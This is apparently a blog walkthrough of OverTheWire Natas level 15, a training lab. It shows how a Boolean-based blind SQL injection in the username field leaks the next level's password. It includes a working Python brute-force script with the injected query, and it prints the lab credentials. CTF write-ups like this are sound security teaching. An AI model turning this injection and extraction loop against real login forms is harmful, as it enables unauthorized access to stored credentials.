Hello everyone, I would like to share how I solved Nastas CTF also Here is the updated password, I hope this write-up will be helpful.
hello Folks!!! it’s a samxia99
My Bio link:-https://beacons.ai/samxia99
Greetings everyone! I’m excited to share with you how I was able to successfully conquer a CTF challenge. Through this write-up, I’ll provide a clear explanation of my techniques and strategies, and I’m confident that it will greatly benefit those who are interested in CTF challenges. So, sit back, relax, and let me take you on an informative journey.
Just a quick reminder that the game has been updated, so the password has also been changed. I hope this password is helpful!
Natas Level 14 → Level 15
- Here are the login details.
Username: natas15
URL: http://natas15.natas.labs.overthewire.org
- After logging in we can see this page.
- let’s view the source code.
- This level is Boolean Based on Blind SQL Injection. so we can solve this with SQL query. “username”: ‘natas16" AND password LIKE BINARY “‘ + “” We can put this query in a python script and brute force to get the password.
- Here is the script make a .py file and brute force it.
import requests
import re
characters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
username = "natas15"
password = "TTkaI7AWG4iDERztBcEyKV7kRXH1EZRB"
url = "http://natas15.natas.labs.overthewire.org"
session = requests.Session()
current_password = list()
while(True):
for character in characters:
print("Trying with: " + "".join(current_password) + character)
response = session.post(url, data={"username": 'natas16" AND password LIKE BINARY "' + "".join(current_password) + character + '%" #'},auth=(username, password))
if "This user exists." in response.text:
current_password.append(character)
break
if len(current_password) == 32:
break
- Use Python to run our .py file and it will start to brute force.
- Here we get the password after the brute force has been done.
Pass:-TRD7iZrd5gATjj9PkPEuaOlfEjHqj32V
Hopefully, this write-up will be useful for everybody, I have tried to make it easy to read.
Next level:-https://medium.com/@samarthkokil64/overthewire-updated-natas-walkthrough-level-16-d3cb5b3f6c2e
Previous level:-https://medium.com/@samarthkokil64/overthewire-updated-natas-walkthrough-level-14-56d78dddd384
PS:- THANKS FOR READING